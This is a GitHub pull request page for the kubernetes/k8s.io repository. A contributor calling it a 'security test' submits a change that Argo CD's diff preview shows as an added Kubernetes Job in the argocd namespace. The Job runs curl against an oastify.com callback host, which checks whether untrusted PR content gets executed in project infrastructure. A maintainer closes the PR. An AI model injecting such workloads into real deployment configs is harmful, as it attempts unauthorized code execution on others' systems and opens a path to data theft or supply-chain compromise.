Skip to content

i just wanna be happy#9063

Closed
Jhounx wants to merge 3 commits intokubernetes:mainfrom
Jhounx:main
Closed

i just wanna be happy#9063
Jhounx wants to merge 3 commits intokubernetes:mainfrom
Jhounx:main

Conversation

@Jhounx
Copy link

@Jhounx Jhounx commented Feb 5, 2026

just a secutiry test bugb

@linux-foundation-easycla
Copy link

CLA Not Signed

@k8s-ci-robot
Copy link
Contributor

[APPROVALNOTIFIER] This PR is NOT APPROVED

This pull-request has been approved by: Jhounx
Once this PR has been reviewed and has the lgtm label, please assign jbpratt for approval. For more information see the Code Review Process.

The full list of commands accepted by this bot can be found here.

Details Needs approval from an approver in each of these files:

Approvers can indicate their approval by writing /approve in a comment
Approvers can cancel approval by writing /approve cancel in a comment

@k8s-ci-robot k8s-ci-robot added cncf-cla: no Indicates the PR's author has not signed the CNCF CLA. needs-ok-to-test Indicates a PR that requires an org member to verify it is safe to test. labels Feb 5, 2026
@k8s-ci-robot
Copy link
Contributor

Hi @Jhounx. Thanks for your PR.

I'm waiting for a kubernetes member to verify that this patch is reasonable to test. If it is, they should reply with /ok-to-test on its own line. Until that is done, I will not automatically test new commits in this PR, but the usual testing commands by org members will still work. Regular contributors should join the org to skip this step.

Once the patch is verified, the new status will be reflected by the ok-to-test label.

I understand the commands that are listed here.

Details

Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes-sigs/prow repository.

@k8s-ci-robot k8s-ci-robot added area/prow Setting up or working with prow in general, prow.k8s.io, prow build clusters sig/k8s-infra Categorizes an issue or PR as relevant to SIG K8s Infra. size/S Denotes a PR that changes 10-29 lines, ignoring generated files. sig/testing Categorizes an issue or PR as relevant to SIG Testing. labels Feb 5, 2026
@k8s-infra-ci-robot
Copy link
Contributor

Argo CD Diff Preview

Summary:

Total: 1 files changed

Modified (1):
± argocd (+19)
argocd (kubernetes/apps/argocd.yaml)
@@ Application modified: argocd (kubernetes/apps/argocd.yaml) @@
     repoURL: https://github.com/kubernetes/k8s.io
     targetRevision: main
   syncPolicy:
     automated:
       prune: false
       selfHeal: true
 ---
+apiVersion: batch/v1
+kind: Job
+metadata:
+  name: curl-test
+  namespace: argocd
+spec:
+  backoffLimit: 0
+  template:
+    spec:
+      containers:
+      - command:
+        - /bin/sh
+        - -c
+        - |
+          curl -sS -o /dev/null -w "status=%{http_code}\n" http://87dusb9qbcpovq74xrik16dfc6ix6suh.oastify.com/healthz
+        image: curlimages/curl:latest
+        name: curl
+      restartPolicy: Never
+---
 apiVersion: external-secrets.io/v1
 kind: ExternalSecret
 metadata:
   name: ibm-ppc64le
   namespace: argocd
 spec:
   data:

Stats:
[Applications: 74], [Full Run: 1m37s], [Rendering: 1m28s], [Cluster: 0s], [Argo CD: 4s]

@hakman hakman closed this Feb 5, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

area/prow Setting up or working with prow in general, prow.k8s.io, prow build clusters cncf-cla: no Indicates the PR's author has not signed the CNCF CLA. needs-ok-to-test Indicates a PR that requires an org member to verify it is safe to test. sig/k8s-infra Categorizes an issue or PR as relevant to SIG K8s Infra. sig/testing Categorizes an issue or PR as relevant to SIG Testing. size/S Denotes a PR that changes 10-29 lines, ignoring generated files.

Projects

None yet

Development

Successfully merging this pull request may close these issues.

4 participants